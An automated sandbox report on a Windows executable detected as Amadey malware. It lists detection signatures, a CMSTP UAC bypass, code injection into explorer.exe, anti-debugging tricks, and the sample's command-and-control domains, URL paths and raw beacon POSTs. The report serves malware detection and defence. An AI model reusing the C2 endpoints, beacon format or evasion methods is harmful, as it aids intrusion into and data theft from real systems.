Windows Analysis Report
5Z1WFRMTOXRH6X21Z8NU8.exe

Overview

General Information

Sample name:	5Z1WFRMTOXRH6X21Z8NU8.exe
Analysis ID:	1542426
MD5:	ff827141856089465cec7afdc9e65f9d
SHA1:	e985a1d59d90a6522b4077b00bc68c86fc3d72d8
SHA256:	389d5818cb26a1cc113481b66332d164dc76d2c85d8735c074a9bc2409b8c9c0
Tags:	exeuser-aachum
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\cnfpnteryde	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw	Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2300617328.0000000001156000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5Z1WFRMTOXRH6X21Z8NU8.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: more.com PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logioptionsplus_updater.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: more.com PID: 8152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3492, type: MEMORYSTR

Uses 32bit PE files

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source:	Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source:	Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0079ED13 FindFirstFileExW,

14_2_0079ED13

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49838 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49838 -> 188.114.97.3:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 188.114.97.3 80

Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 39 43 45 34 34 41 44 31 33 43 31 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 46 44 44 43 37 31 30 35 39 37 32 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 38 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A76659CE44AD13C1D58C48CF8B295278F7EBCB075A9634FFDDC7105972FEA7596F64579EC8B2482ABAE6C811856F005AE078E55178

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00770370 Sleep,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,

14_2_00770370

Source: global traffic	DNS traffic detected: DNS query: artvisions-autoinsider3.com
Source: global traffic	DNS traffic detected: DNS query: artvisions-autoinsider.com
Source: global traffic	DNS traffic detected: DNS query: artvisions-autoinsider2.com

Source: unknown

HTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/5
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php&
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpH
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpQ
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php0
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php?
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpM
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpdu
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/c
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.php(
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.phpP
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/S
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
